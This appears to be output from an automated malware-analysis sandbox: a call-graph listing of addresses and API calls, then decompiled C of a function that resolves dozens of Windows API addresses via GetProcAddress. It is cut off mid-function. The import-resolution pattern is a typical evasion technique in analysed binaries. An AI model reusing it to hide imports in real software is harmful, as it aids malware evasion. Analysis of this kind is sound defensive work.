27901->27757 27902->27774 27903->27776 27904->27778 27905->27780 27906->27792 27907->27794 27908->27796 27909->27798 27924 29da63a0 27911->27924 27919 29da4803 std::ios_base::_Tidy 27961 29da4850 27919->27961 27922 29dadf46 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 27923 29da484a 27922->27923 27923->27802 27965 29d98e90 27924->27965 27926 29da63ec 27975 29da20a0 27926->27975 27929 29da47a1 27931 29da1f70 27929->27931 28026 29dada9c 27931->28026 27934 29dae70e std::_Mutex::_Mutex 77 API calls 27935 29da1fb5 27934->27935 27941 29da1fea 27935->27941 28031 29dad974 82 API calls 8 library calls 27935->28031 27937 29da1fc3 27938 29dada5d std::_Lockit::_Lockit EnterCriticalSection 27937->27938 27939 29da1fd6 27938->27939 27940 29dada85 std::locale::_Locimp::_Locimp_dtor LeaveCriticalSection 27939->27940 27940->27941 27942 29da52f0 27941->27942 27943 29da5333 27942->27943 27944 29da5357 27943->27944 28033 29da0990 67 API calls 27943->28033 27946 29d98e50 2 API calls 27944->27946 27957 29da53c7 27944->27957 27947 29da5383 27946->27947 28034 29da7ce0 114 API calls 5 library calls 27947->28034 27949 29da548d 27950 29da47f5 27949->27950 28036 29da7000 67 API calls 27949->28036 27958 29da5a00 27950->27958 27951 29da538e 27954 29dada5d std::_Lockit::_Lockit EnterCriticalSection 27951->27954 27951->27957 27955 29da53a6 27954->27955 27956 29dada85 std::locale::_Locimp::_Locimp_dtor LeaveCriticalSection 27955->27956 27956->27957 27957->27949 28035 29d98d80 67 API calls 2 library calls 27957->28035 28037 29da6460 27958->28037 27962 29da4897 27961->27962 28046 29dad669 27962->28046 27964 29da4831 27964->27922 27966 29dae70e std::_Mutex::_Mutex 77 API calls 27965->27966 27967 29d98eca 27966->27967 27968 29d98f0b 27967->27968 27985 29dad974 82 API calls 8 library calls 27967->27985 27968->27926 27970 29d98ed8 27986 29dada5d 27970->27986 27996 29d98e50 27975->27996 27980 29dada5d std::_Lockit::_Lockit EnterCriticalSection 27981 29da20f9 27980->27981 27982 
29dada85 std::locale::_Locimp::_Locimp_dtor LeaveCriticalSection 27981->27982 27983 29da211a 27982->27983 27983->27929 27984 29d98d80 67 API calls 2 library calls 27983->27984 27985->27970 27987 29d98eeb 27986->27987 27988 29dada6f 27986->27988 27990 29dada85 27987->27990 27994 29dadec8 EnterCriticalSection 27988->27994 27991 29d98f02 27990->27991 27992 29dada8c 27990->27992 27991->27926 27995 29daded8 LeaveCriticalSection 27992->27995 27994->27987 27995->27991 27997 29dada5d std::_Lockit::_Lockit EnterCriticalSection 27996->27997 27998 29d98e66 27997->27998 27999 29dada85 std::locale::_Locimp::_Locimp_dtor LeaveCriticalSection 27998->27999 28000 29d98e7a 27999->28000 28001 29da2340 28000->28001 28002 29dada5d std::_Lockit::_Lockit EnterCriticalSection 28001->28002 28003 29da2371 28002->28003 28004 29dada5d std::_Lockit::_Lockit EnterCriticalSection 28003->28004 28007 29da23b5 28003->28007 28005 29da2394 28004->28005 28006 29dada85 std::locale::_Locimp::_Locimp_dtor LeaveCriticalSection 28005->28006 28006->28007 28021 29da23f2 28007->28021 28022 29d98b30 114 API calls std::_Mutex::_Mutex 28007->28022 28008 29dada85 std::locale::_Locimp::_Locimp_dtor LeaveCriticalSection 28010 29da20df 28008->28010 28010->27980 28010->27983 28011 29da2400 28012 29da2423 28011->28012 28023 29dae158 66 API calls std::exception::exception 28011->28023 28014 29dada5d std::_Lockit::_Lockit EnterCriticalSection 28012->28014 28016 29da2436 28014->28016 28015 29da2415 28024 29daff06 RaiseException 28015->28024 28018 29dada85 std::locale::_Locimp::_Locimp_dtor LeaveCriticalSection 28016->28018 28019 29da244a 28018->28019 28025 29dad6bc 77 API calls std::_Mutex::_Mutex 28019->28025 28021->28008 28022->28011 28023->28015 28024->28012 28025->28021 28027 29dae70e std::_Mutex::_Mutex 77 API calls 28026->28027 28028 29dadaa8 28027->28028 28032 29dadea8 InitializeCriticalSection 28028->28032 28030 29da1fa7 28030->27934 28031->27937 28032->28030 28033->27944 28034->27951 28036->27950 28038 29da649d 
28037->28038 28039 29da64f3 28037->28039 28038->28039 28040 29da64a4 28038->28040 28042 29d892c0 77 API calls 28039->28042 28043 29da64ce std::ios_base::_Tidy 28039->28043 28041 29d892c0 77 API calls 28040->28041 28041->28043 28042->28043 28044 29dadf46 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 28043->28044 28045 29da5a16 28044->28045 28045->27919 28047 29dad678 std::ios_base::_Tidy 28046->28047 28049 29dad69d std::ios_base::_Tidy 28047->28049 28050 29d98a80 EnterCriticalSection LeaveCriticalSection std::locale::_Locimp::_Locimp_dtor std::_Lockit::_Lockit 28047->28050 28049->27964 28050->28049 28052 29d892c0 77 API calls 28051->28052 28053 29d8e8d3 28052->28053 28053->27852 28054->27852 28055->27852 28056->27864 28057->27860 28058->27862 28059->27860 28060->27858 28061->27860 28062->27854 28063->27860 28064->27848 28065->27860 28066->27841 28068 29d892c0 77 API calls 28067->28068 28069 29d8e936 28068->28069 28069->27826 28070->27830 28071->27818 28073 29dabeca 28072->28073 28074 29dabeec 28072->28074 28073->28074 28075 29dabef2 CreateFileMappingA 28073->28075 28074->27870 28076 29dabf0a MapViewOfFile 28075->28076 28077 29dabf33 28075->28077 28078 29dabf39 28076->28078 28079 29dabf22 CloseHandle 28076->28079 28077->27870 28078->27870 28079->28077

Control-flow Graph of function 29DA8390 (figure; legend: Executed, Not Executed)
                                        C-Code - Quality: 100%
                                        			E29DA8390() {
                                        				struct HINSTANCE__* _t1;
                                        				struct HINSTANCE__* _t2;
                                        				struct HINSTANCE__* _t3;
                                        				CHAR* _t4;
                                        				struct HINSTANCE__* _t5;
                                        				struct HINSTANCE__* _t6;
                                        				CHAR* _t8;
                                        				struct HINSTANCE__* _t9;
                                        				struct HINSTANCE__* _t10;
                                        				struct HINSTANCE__* _t11;
                                        				CHAR* _t12;
                                        				struct HINSTANCE__* _t13;
                                        				struct HINSTANCE__* _t14;
                                        				struct HINSTANCE__* _t15;
                                        				struct HINSTANCE__* _t16;
                                        				struct HINSTANCE__* _t17;
                                        				struct HINSTANCE__* _t18;
                                        				struct HINSTANCE__* _t19;
                                        				struct HINSTANCE__* _t20;
                                        				struct HINSTANCE__* _t21;
                                        				struct HINSTANCE__* _t22;
                                        				struct HINSTANCE__* _t23;
                                        				struct HINSTANCE__* _t24;
                                        				struct HINSTANCE__* _t25;
                                        				struct HINSTANCE__* _t26;
                                        				struct HINSTANCE__* _t27;
                                        				_Unknown_base(*)()* _t28;
                                        				CHAR* _t29;
                                        				_Unknown_base(*)()* _t30;
                                        				struct HINSTANCE__* _t31;
                                        				_Unknown_base(*)()* _t32;
                                        				_Unknown_base(*)()* _t33;
                                        				CHAR* _t34;
                                        				_Unknown_base(*)()* _t35;
                                        				struct HINSTANCE__* _t36;
                                        				_Unknown_base(*)()* _t37;
                                        				_Unknown_base(*)()* _t38;
                                        				CHAR* _t39;
                                        				_Unknown_base(*)()* _t40;
                                        				_Unknown_base(*)()* _t42;
                                        				struct HINSTANCE__* _t43;
                                        				_Unknown_base(*)()* _t44;
                                        				_Unknown_base(*)()* _t45;
                                        				CHAR* _t46;
                                        				_Unknown_base(*)()* _t47;
                                        				struct HINSTANCE__* _t48;
                                        				_Unknown_base(*)()* _t49;
                                        				_Unknown_base(*)()* _t51;
                                        				struct HINSTANCE__* _t52;
                                        				_Unknown_base(*)()* _t53;
                                        				_Unknown_base(*)()* _t55;
                                        				struct HINSTANCE__* _t56;
                                        				_Unknown_base(*)()* _t57;
                                        				_Unknown_base(*)()* _t59;
                                        				struct HINSTANCE__* _t60;
                                        				_Unknown_base(*)()* _t61;
                                        				_Unknown_base(*)()* _t62;
                                        				CHAR* _t63;
                                        				_Unknown_base(*)()* _t64;
                                        				struct HINSTANCE__* _t65;
                                        				_Unknown_base(*)()* _t66;
                                        				_Unknown_base(*)()* _t67;
                                        				CHAR* _t68;
                                        				_Unknown_base(*)()* _t69;
                                        				struct HINSTANCE__* _t70;
                                        				_Unknown_base(*)()* _t71;
                                        				_Unknown_base(*)()* _t72;
                                        				CHAR* _t73;
                                        				_Unknown_base(*)()* _t74;
                                        				struct HINSTANCE__* _t75;
                                        				_Unknown_base(*)()* _t77;
                                        				struct HINSTANCE__* _t78;
                                        				_Unknown_base(*)()* _t79;
                                        				_Unknown_base(*)()* _t80;
                                        				CHAR* _t81;
                                        				_Unknown_base(*)()* _t82;
                                        				struct HINSTANCE__* _t83;
                                        				_Unknown_base(*)()* _t85;
                                        				CHAR* _t86;
                                        				_Unknown_base(*)()* _t87;
                                        				struct HINSTANCE__* _t88;
                                        				_Unknown_base(*)()* _t89;
                                        				_Unknown_base(*)()* _t90;
                                        				CHAR* _t91;
                                        				_Unknown_base(*)()* _t92;
                                        				struct HINSTANCE__* _t93;
                                        				_Unknown_base(*)()* _t94;
                                        				_Unknown_base(*)()* _t96;
                                        				struct HINSTANCE__* _t97;
                                        				_Unknown_base(*)()* _t98;
                                        				_Unknown_base(*)()* _t99;
                                        				CHAR* _t100;
                                        				_Unknown_base(*)()* _t101;
                                        				struct HINSTANCE__* _t102;
                                        				_Unknown_base(*)()* _t103;
                                        				_Unknown_base(*)()* _t104;
                                        				CHAR* _t105;
                                        				_Unknown_base(*)()* _t106;
                                        				struct HINSTANCE__* _t107;
                                        				_Unknown_base(*)()* _t108;
                                        				_Unknown_base(*)()* _t109;
                                        				CHAR* _t110;
                                        				_Unknown_base(*)()* _t111;
                                        				struct HINSTANCE__* _t112;
                                        				_Unknown_base(*)()* _t113;
                                        				_Unknown_base(*)()* _t114;
                                        				CHAR* _t115;
                                        				_Unknown_base(*)()* _t117;
                                        				struct HINSTANCE__* _t118;
                                        				_Unknown_base(*)()* _t119;
                                        				_Unknown_base(*)()* _t120;
                                        				CHAR* _t121;
                                        				_Unknown_base(*)()* _t122;
                                        				struct HINSTANCE__* _t123;
                                        				_Unknown_base(*)()* _t124;
                                        				_Unknown_base(*)()* _t125;
                                        				CHAR* _t126;
                                        				_Unknown_base(*)()* _t127;
                                        				struct HINSTANCE__* _t128;
                                        				_Unknown_base(*)()* _t129;
                                        				_Unknown_base(*)()* _t130;
                                        				CHAR* _t131;
                                        				_Unknown_base(*)()* _t132;
                                        				struct HINSTANCE__* _t133;
                                        				_Unknown_base(*)()* _t134;
                                        				_Unknown_base(*)()* _t135;
                                        				CHAR* _t136;
                                        				_Unknown_base(*)()* _t137;
                                        				struct HINSTANCE__* _t138;
                                        				_Unknown_base(*)()* _t139;
                                        				_Unknown_base(*)()* _t141;
                                        				struct HINSTANCE__* _t142;
                                        				_Unknown_base(*)()* _t143;
                                        				_Unknown_base(*)()* _t145;
                                        				struct HINSTANCE__* _t146;
                                        				_Unknown_base(*)()* _t147;
                                        				_Unknown_base(*)()* _t148;
                                        				CHAR* _t149;
                                        				_Unknown_base(*)()* _t150;
                                        				struct HINSTANCE__* _t151;
                                        				_Unknown_base(*)()* _t152;
                                        				_Unknown_base(*)()* _t154;
                                        				struct HINSTANCE__* _t155;
                                        				_Unknown_base(*)()* _t156;
                                        				_Unknown_base(*)()* _t157;
                                        				CHAR* _t158;
                                        				_Unknown_base(*)()* _t159;
                                        				struct HINSTANCE__* _t160;
                                        				_Unknown_base(*)()* _t161;
                                        				_Unknown_base(*)()* _t162;
                                        				CHAR* _t163;
                                        				_Unknown_base(*)()* _t164;
                                        				struct HINSTANCE__* _t165;
                                        				_Unknown_base(*)()* _t166;
                                        				_Unknown_base(*)()* _t167;
                                        				CHAR* _t168;
                                        				_Unknown_base(*)()* _t169;
                                        				struct HINSTANCE__* _t170;
                                        				_Unknown_base(*)()* _t171;
                                        				_Unknown_base(*)()* _t172;
                                        				CHAR* _t173;
                                        				_Unknown_base(*)()* _t174;
                                        				struct HINSTANCE__* _t175;
                                        				_Unknown_base(*)()* _t176;
                                        				_Unknown_base(*)()* _t177;
                                        				CHAR* _t178;
                                        				_Unknown_base(*)()* _t179;
                                        				struct HINSTANCE__* _t180;
                                        				_Unknown_base(*)()* _t181;
                                        				_Unknown_base(*)()* _t182;
                                        				CHAR* _t183;
                                        				_Unknown_base(*)()* _t184;
                                        				struct HINSTANCE__* _t185;
                                        				_Unknown_base(*)()* _t186;
                                        				_Unknown_base(*)()* _t187;
                                        				CHAR* _t188;
                                        				_Unknown_base(*)()* _t189;
                                        				struct HINSTANCE__* _t190;
                                        				_Unknown_base(*)()* _t191;
                                        				_Unknown_base(*)()* _t192;
                                        				CHAR* _t193;
                                        				_Unknown_base(*)()* _t194;
                                        				struct HINSTANCE__* _t195;
                                        				_Unknown_base(*)()* _t196;
                                        				CHAR* _t198;
                                        				_Unknown_base(*)()* _t199;
                                        				struct HINSTANCE__* _t200;
                                        				_Unknown_base(*)()* _t201;
                                        				_Unknown_base(*)()* _t202;
                                        				CHAR* _t203;
                                        				_Unknown_base(*)()* _t204;
                                        				struct HINSTANCE__* _t205;
                                        				_Unknown_base(*)()* _t206;
                                        				_Unknown_base(*)()* _t207;
                                        				CHAR* _t208;
                                        				_Unknown_base(*)()* _t209;
                                        				struct HINSTANCE__* _t210;
                                        				_Unknown_base(*)()* _t211;
                                        				_Unknown_base(*)()* _t212;
                                        				CHAR* _t213;
                                        				_Unknown_base(*)()* _t214;
                                        				struct HINSTANCE__* _t215;
                                        				_Unknown_base(*)()* _t216;
                                        				_Unknown_base(*)()* _t217;
                                        				CHAR* _t218;
                                        				_Unknown_base(*)()* _t219;
                                        				struct HINSTANCE__* _t220;
                                        				_Unknown_base(*)()* _t221;
                                        				_Unknown_base(*)()* _t222;
                                        				CHAR* _t223;
                                        				_Unknown_base(*)()* _t224;
                                        				struct HINSTANCE__* _t225;
                                        				_Unknown_base(*)()* _t226;
                                        				_Unknown_base(*)()* _t227;
                                        				CHAR* _t228;
                                        				_Unknown_base(*)()* _t229;
                                        				struct HINSTANCE__* _t230;
                                        				_Unknown_base(*)()* _t231;
                                        				_Unknown_base(*)()* _t232;
                                        				CHAR* _t233;
                                        				_Unknown_base(*)()* _t234;
                                        				struct HINSTANCE__* _t235;
                                        				_Unknown_base(*)()* _t236;
                                        				_Unknown_base(*)()* _t237;
                                        				CHAR* _t238;
                                        				_Unknown_base(*)()* _t239;
                                        				struct HINSTANCE__* _t240;
                                        				_Unknown_base(*)()* _t241;
                                        				CHAR* _t243;
                                        				_Unknown_base(*)()* _t244;
                                        				struct HINSTANCE__* _t245;
                                        				_Unknown_base(*)()* _t246;
                                        				_Unknown_base(*)()* _t247;
                                        				CHAR* _t248;
                                        				_Unknown_base(*)()* _t249;
                                        				struct HINSTANCE__* _t250;
                                        				CHAR* _t252;
                                        				CHAR* _t253;
                                        				CHAR* _t254;
                                        				CHAR* _t255;
                                        				struct HINSTANCE__* _t256;
                                        				CHAR* _t257;
                                        				struct HINSTANCE__* _t258;
                                        				CHAR* _t259;
                                        				struct HINSTANCE__* _t260;
                                        				CHAR* _t261;
                                        				CHAR* _t262;
                                        				CHAR* _t263;
                                        				struct HINSTANCE__* _t264;
                                        				CHAR* _t265;
                                        				CHAR* _t266;
                                        				CHAR* _t267;
                                        				CHAR* _t268;
                                        				CHAR* _t269;
                                        				CHAR* _t270;
                                        				CHAR* _t271;
                                        				struct HINSTANCE__* _t272;
                                        				CHAR* _t273;
                                        				struct HINSTANCE__* _t274;
                                        				CHAR* _t275;
                                        				struct HINSTANCE__* _t276;
                                        				CHAR* _t277;
                                        				CHAR* _t278;
                                        				struct HINSTANCE__* _t279;
                                        				struct HINSTANCE__* _t280;
                                        				CHAR* _t281;
                                        				struct HINSTANCE__* _t282;
                                        				CHAR* _t283;
                                        				CHAR* _t284;
                                        				CHAR* _t285;
                                        				struct HINSTANCE__* _t286;
                                        				CHAR* _t287;
                                        				struct HINSTANCE__* _t288;
                                        				CHAR* _t289;
                                        				struct HINSTANCE__* _t290;
                                        				CHAR* _t291;
                                        				struct HINSTANCE__* _t292;
                                        				CHAR* _t293;
                                        				CHAR* _t294;
                                        				struct HINSTANCE__* _t295;
                                        				CHAR* _t296;
                                        				struct HINSTANCE__* _t297;
                                        				CHAR* _t298;
                                        				struct HINSTANCE__* _t299;
                                        				CHAR* _t300;
                                        				struct HINSTANCE__* _t301;
                                        				CHAR* _t302;
                                        				CHAR* _t303;
                                        				CHAR* _t304;
                                        				CHAR* _t305;
                                        				CHAR* _t306;
                                        				struct HINSTANCE__* _t307;
                                        				CHAR* _t308;
                                        				CHAR* _t309;
                                        				CHAR* _t310;
                                        				struct HINSTANCE__* _t311;
                                        				CHAR* _t312;
                                        				struct HINSTANCE__* _t313;
                                        				CHAR* _t314;
                                        				struct HINSTANCE__* _t315;
                                        				CHAR* _t316;
                                        				struct HINSTANCE__* _t317;
                                        				CHAR* _t318;
                                        				struct HINSTANCE__* _t319;
                                        				CHAR* _t320;
                                        				struct HINSTANCE__* _t321;
                                        				CHAR* _t322;
                                        				struct HINSTANCE__* _t323;
                                        				CHAR* _t324;
                                        				struct HINSTANCE__* _t325;
                                        				CHAR* _t326;
                                        				struct HINSTANCE__* _t327;
                                        				CHAR* _t328;
                                        				struct HINSTANCE__* _t329;
                                        				CHAR* _t330;
                                        				struct HINSTANCE__* _t331;
                                        				CHAR* _t332;
                                        				struct HINSTANCE__* _t333;
                                        				CHAR* _t334;
                                        				struct HINSTANCE__* _t335;
                                        				CHAR* _t336;
                                        				struct HINSTANCE__* _t337;
                                        				CHAR* _t338;
                                        				struct HINSTANCE__* _t339;
                                        				CHAR* _t340;
                                        				struct HINSTANCE__* _t341;
                                        				CHAR* _t342;
                                        				struct HINSTANCE__* _t343;
                                        				CHAR* _t344;
                                        				struct HINSTANCE__* _t345;
                                        				CHAR* _t346;
                                        				struct HINSTANCE__* _t347;
                                        				CHAR* _t348;
                                        				CHAR* _t349;
                                        				CHAR* _t350;
                                        				CHAR* _t351;
                                        				CHAR* _t352;
                                        				CHAR* _t353;
                                        				struct HINSTANCE__* _t354;
                                        				CHAR* _t355;
                                        				struct HINSTANCE__* _t356;
                                        				CHAR* _t357;
                                        				struct HINSTANCE__* _t358;
                                        				CHAR* _t359;
                                        				struct HINSTANCE__* _t360;
                                        				CHAR* _t361;
                                        				struct HINSTANCE__* _t362;
                                        				CHAR* _t363;
                                        				struct HINSTANCE__* _t364;
                                        				CHAR* _t365;
                                        				struct HINSTANCE__* _t366;
                                        				CHAR* _t367;
                                        				struct HINSTANCE__* _t368;
                                        				CHAR* _t369;
                                        				struct HINSTANCE__* _t370;
                                        				CHAR* _t371;
                                        				CHAR* _t372;
                                        				struct HINSTANCE__* _t373;
                                        				CHAR* _t374;
                                        				CHAR* _t375;
                                        				CHAR* _t376;
                                        				struct HINSTANCE__* _t377;
                                        				CHAR* _t378;
                                        				struct HINSTANCE__* _t379;
                                        				CHAR* _t380;
                                        				struct HINSTANCE__* _t381;
                                        				CHAR* _t382;
                                        				struct HINSTANCE__* _t383;
                                        				CHAR* _t384;
                                        				struct HINSTANCE__* _t385;
                                        				CHAR* _t386;
                                        				struct HINSTANCE__* _t387;
                                        				CHAR* _t388;
                                        				struct HINSTANCE__* _t389;
                                        				CHAR* _t390;
                                        				struct HINSTANCE__* _t391;
                                        				CHAR* _t392;
                                        				struct HINSTANCE__* _t393;
                                        				CHAR* _t394;
                                        				struct HINSTANCE__* _t395;
                                        				CHAR* _t396;
                                        				struct HINSTANCE__* _t397;
                                        				CHAR* _t398;
                                        				struct HINSTANCE__* _t399;
                                        				CHAR* _t400;
                                        				struct HINSTANCE__* _t401;
                                        				CHAR* _t402;
                                        				struct HINSTANCE__* _t403;
                                        				CHAR* _t404;
                                        				struct HINSTANCE__* _t405;
                                        				CHAR* _t406;
                                        				struct HINSTANCE__* _t407;
                                        				CHAR* _t408;
                                        				struct HINSTANCE__* _t409;
                                        				CHAR* _t410;
                                        				struct HINSTANCE__* _t411;
                                        				CHAR* _t412;
                                        				struct HINSTANCE__* _t413;
                                        				CHAR* _t414;
                                        				struct HINSTANCE__* _t415;
                                        				CHAR* _t416;
                                        				struct HINSTANCE__* _t417;
                                        				CHAR* _t418;
                                        				struct HINSTANCE__* _t419;
                                        				CHAR* _t420;
                                        				struct HINSTANCE__* _t421;
                                        				CHAR* _t422;
                                        				struct HINSTANCE__* _t423;
                                        				CHAR* _t424;
                                        				struct HINSTANCE__* _t425;
                                        				CHAR* _t426;
                                        				struct HINSTANCE__* _t427;
                                        				CHAR* _t428;
                                        				struct HINSTANCE__* _t429;
                                        				CHAR* _t430;
                                        				struct HINSTANCE__* _t431;
                                        				CHAR* _t432;
                                        				struct HINSTANCE__* _t433;
                                        				CHAR* _t434;
                                        				struct HINSTANCE__* _t435;
                                        				CHAR* _t436;
                                        				struct HINSTANCE__* _t437;
                                        				CHAR* _t438;
                                        				struct HINSTANCE__* _t439;
                                        				CHAR* _t440;
                                        				struct HINSTANCE__* _t441;
                                        				CHAR* _t442;
                                        
                                        				_t1 =  *0x29dd856c; // 0x74ab0000
                                        				if(_t1 != 0) {
                                        					_t309 =  *0x29dd7a74; // 0x15a20e8
                                        					_t154 = GetProcAddress(_t1, _t309);
                                        					_t404 =  *0x29dd7a80; // 0x15a2b58
                                        					 *0x29dd8558 = _t154;
                                        					_t155 =  *0x29dd856c; // 0x74ab0000
                                        					_t156 = GetProcAddress(_t155, _t404);
                                        					_t310 =  *0x29dd7b0c; // 0x15a2268
                                        					_t405 =  *0x29dd856c; // 0x74ab0000
                                        					 *0x29dd85d8 = _t156;
                                        					_t157 = GetProcAddress(_t405, _t310);
                                        					_t311 =  *0x29dd856c; // 0x74ab0000
                                        					 *0x29dd8540 = _t157;
                                        					_t158 =  *0x29dd80b0; // 0x1596b88
                                        					_t159 = GetProcAddress(_t311, _t158);
                                        					_t406 =  *0x29dd812c; // 0x15a2298
                                        					 *0x29dd8414 = _t159;
                                        					_t160 =  *0x29dd856c; // 0x74ab0000
                                        					_t161 = GetProcAddress(_t160, _t406);
                                        					_t312 =  *0x29dd7e8c; // 0x15a2c78
                                        					_t407 =  *0x29dd856c; // 0x74ab0000
                                        					 *0x29dd840c = _t161;
                                        					_t162 = GetProcAddress(_t407, _t312);
                                        					_t313 =  *0x29dd856c; // 0x74ab0000
                                        					 *0x29dd84b8 = _t162;
                                        					_t163 =  *0x29dd7afc; // 0x15a22b0
                                        					_t164 = GetProcAddress(_t313, _t163);
                                        					_t408 =  *0x29dd7d78; // 0x15a2310
                                        					 *0x29dd85c8 = _t164;
                                        					_t165 =  *0x29dd856c; // 0x74ab0000
                                        					_t166 = GetProcAddress(_t165, _t408);
                                        					_t314 =  *0x29dd81c8; // 0x15a2100
                                        					_t409 =  *0x29dd856c; // 0x74ab0000
                                        					 *0x29dd8504 = _t166;
                                        					_t167 = GetProcAddress(_t409, _t314);
                                        					_t315 =  *0x29dd856c; // 0x74ab0000
                                        					 *0x29dd857c = _t167;
                                        					_t168 =  *0x29dd813c; // 0x15a2148
                                        					_t169 = GetProcAddress(_t315, _t168);
                                        					_t410 =  *0x29dd8114; // 0x15a2130
                                        					 *0x29dd83b4 = _t169;
                                        					_t170 =  *0x29dd856c; // 0x74ab0000
                                        					_t171 = GetProcAddress(_t170, _t410);
                                        					_t316 =  *0x29dd82a8; // 0x15a22c8
                                        					_t411 =  *0x29dd856c; // 0x74ab0000
                                        					 *0x29dd8590 = _t171;
                                        					_t172 = GetProcAddress(_t411, _t316);
                                        					_t317 =  *0x29dd856c; // 0x74ab0000
                                        					 *0x29dd84dc = _t172;
                                        					_t173 =  *0x29dd7cc8; // 0x15a2178
                                        					_t174 = GetProcAddress(_t317, _t173);
                                        					_t412 =  *0x29dd7fac; // 0x15a2b38
                                        					 *0x29dd83b8 = _t174;
                                        					_t175 =  *0x29dd856c; // 0x74ab0000
                                        					_t176 = GetProcAddress(_t175, _t412);
                                        					_t318 =  *0x29dd7f48; // 0x15a22e0
                                        					_t413 =  *0x29dd856c; // 0x74ab0000
                                        					 *0x29dd84b4 = _t176;
                                        					_t177 = GetProcAddress(_t413, _t318);
                                        					_t319 =  *0x29dd856c; // 0x74ab0000
                                        					 *0x29dd8418 = _t177;
                                        					_t178 =  *0x29dd7fd4; // 0x15a2190
                                        					_t179 = GetProcAddress(_t319, _t178);
                                        					_t414 =  *0x29dd7a70; // 0x15a21a8
                                        					 *0x29dd83f8 = _t179;
                                        					_t180 =  *0x29dd856c; // 0x74ab0000
                                        					_t181 = GetProcAddress(_t180, _t414);
                                        					_t320 =  *0x29dd817c; // 0x15a2bd8
                                        					_t415 =  *0x29dd856c; // 0x74ab0000
                                        					 *0x29dd85cc = _t181;
                                        					_t182 = GetProcAddress(_t415, _t320);
                                        					_t321 =  *0x29dd856c; // 0x74ab0000
                                        					 *0x29dd8394 = _t182;
                                        					_t183 =  *0x29dd7fc0; // 0x15a2280
                                        					_t184 = GetProcAddress(_t321, _t183);
                                        					_t416 =  *0x29dd8078; // 0x15a20d0
                                        					 *0x29dd85e0 = _t184;
                                        					_t185 =  *0x29dd856c; // 0x74ab0000
                                        					_t186 = GetProcAddress(_t185, _t416);
                                        					_t322 =  *0x29dd7cc4; // 0x15a2370
                                        					_t417 =  *0x29dd856c; // 0x74ab0000
                                        					 *0x29dd8438 = _t186;
                                        					_t187 = GetProcAddress(_t417, _t322);
                                        					_t323 =  *0x29dd856c; // 0x74ab0000
                                        					 *0x29dd83a8 = _t187;
                                        					_t188 =  *0x29dd7f50; // 0x15a2328
                                        					_t189 = GetProcAddress(_t323, _t188);
                                        					_t418 =  *0x29dd7e24; // 0x15a2388
                                        					 *0x29dd84e8 = _t189;
                                        					_t190 =  *0x29dd856c; // 0x74ab0000
                                        					_t191 = GetProcAddress(_t190, _t418);
                                        					_t324 =  *0x29dd7b34; // 0x15a22f8
                                        					_t419 =  *0x29dd856c; // 0x74ab0000
                                        					 *0x29dd8498 = _t191;
                                        					_t192 = GetProcAddress(_t419, _t324);
                                        					_t325 =  *0x29dd856c; // 0x74ab0000
                                        					 *0x29dd83cc = _t192;
                                        					_t193 =  *0x29dd7bf8; // 0x15a21f0
                                        					_t194 = GetProcAddress(_t325, _t193);
                                        					_t420 =  *0x29dd7dd0; // 0x15a2208
                                        					 *0x29dd8360 = _t194;
                                        					_t195 =  *0x29dd856c; // 0x74ab0000
                                        					_t196 = GetProcAddress(_t195, _t420);
                                        					_t326 =  *0x29dd7eec; // 0x15a2220
                                        					_t421 =  *0x29dd856c; // 0x74ab0000
                                        					 *0x29dd85dc = _t196;
                                        					 *0x29dd83ec = GetProcAddress(_t421, _t326);
                                        					_t198 =  *0x29dd7c1c; // 0x15a2c18
                                        					_t327 =  *0x29dd856c; // 0x74ab0000
                                        					_t199 = GetProcAddress(_t327, _t198);
                                        					_t422 =  *0x29dd7f2c; // 0x15a4808
                                        					 *0x29dd8494 = _t199;
                                        					_t200 =  *0x29dd856c; // 0x74ab0000
                                        					_t201 = GetProcAddress(_t200, _t422);
                                        					_t328 =  *0x29dd8004; // 0x15a49d0
                                        					_t423 =  *0x29dd856c; // 0x74ab0000
                                        					 *0x29dd8510 = _t201;
                                        					_t202 = GetProcAddress(_t423, _t328);
                                        					_t329 =  *0x29dd856c; // 0x74ab0000
                                        					 *0x29dd836c = _t202;
                                        					_t203 =  *0x29dd8288; // 0x15a2958
                                        					_t204 = GetProcAddress(_t329, _t203);
                                        					_t424 =  *0x29dd8058; // 0x1597100
                                        					 *0x29dd85b0 = _t204;
                                        					_t205 =  *0x29dd856c; // 0x74ab0000
                                        					_t206 = GetProcAddress(_t205, _t424);
                                        					_t330 =  *0x29dd7e10; // 0x15a48e0
                                        					_t425 =  *0x29dd856c; // 0x74ab0000
                                        					 *0x29dd85d0 = _t206;
                                        					_t207 = GetProcAddress(_t425, _t330);
                                        					_t331 =  *0x29dd856c; // 0x74ab0000
                                        					 *0x29dd83c8 = _t207;
                                        					_t208 =  *0x29dd7a7c; // 0x15a4820
                                        					_t209 = GetProcAddress(_t331, _t208);
                                        					_t426 =  *0x29dd7e84; // 0x15a2998
                                        					 *0x29dd8424 = _t209;
                                        					_t210 =  *0x29dd856c; // 0x74ab0000
                                        					_t211 = GetProcAddress(_t210, _t426);
                                        					_t332 =  *0x29dd7f9c; // 0x15a48f8
                                        					_t427 =  *0x29dd856c; // 0x74ab0000
                                        					 *0x29dd8398 = _t211;
                                        					_t212 = GetProcAddress(_t427, _t332);
                                        					_t333 =  *0x29dd856c; // 0x74ab0000
                                        					 *0x29dd83d0 = _t212;
                                        					_t213 =  *0x29dd7ba0; // 0x15a4898
                                        					_t214 = GetProcAddress(_t333, _t213);
                                        					_t428 =  *0x29dd7d24; // 0x15a2c98
                                        					 *0x29dd85a8 = _t214;
                                        					_t215 =  *0x29dd856c; // 0x74ab0000
                                        					_t216 = GetProcAddress(_t215, _t428);
                                        					_t334 =  *0x29dd7c60; // 0x15a4a18
                                        					_t429 =  *0x29dd856c; // 0x74ab0000
                                        					 *0x29dd84c4 = _t216;
                                        					_t217 = GetProcAddress(_t429, _t334);
                                        					_t335 =  *0x29dd856c; // 0x74ab0000
                                        					 *0x29dd84a8 = _t217;
                                        					_t218 =  *0x29dd8128; // 0x15a4940
                                        					_t219 = GetProcAddress(_t335, _t218);
                                        					_t430 =  *0x29dd8080; // 0x15a4a30
                                        					 *0x29dd855c = _t219;
                                        					_t220 =  *0x29dd856c; // 0x74ab0000
                                        					_t221 = GetProcAddress(_t220, _t430);
                                        					_t336 =  *0x29dd7bd0; // 0x15a2c58
                                        					_t431 =  *0x29dd856c; // 0x74ab0000
                                        					 *0x29dd8420 = _t221;
                                        					_t222 = GetProcAddress(_t431, _t336);
                                        					_t337 =  *0x29dd856c; // 0x74ab0000
